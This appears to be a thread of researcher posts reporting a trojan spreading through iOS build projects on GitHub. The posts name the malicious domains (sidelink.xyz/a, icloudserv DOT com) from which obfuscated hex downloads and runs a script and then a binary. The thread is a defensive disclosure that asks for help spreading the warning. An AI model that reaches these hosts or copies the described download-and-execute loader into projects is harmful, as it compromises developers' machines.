It seems a new trojan is going around and affecting @Apple#iOS builds. I don't know the original method of infection, but I'm starting to see some public repos on GitHub being affected
If you care to de-obfuscate the HEX, it downloads and executes a script from sidelink.xyz/a (a server in Moscow) which in turn downloads a binary from the same site...
Do I know someone besides @k8em0 and @Fox0x01 that could spread a couple of words in the right places?
Kudos to our team @OetkerDigital for first finding this out, and thanks @acquavascia for spreading the word!
Some other variants download from icloudserv DOT com (pointing to the same IP as sidelink DOT xyz)... Still going through some of the variants 😀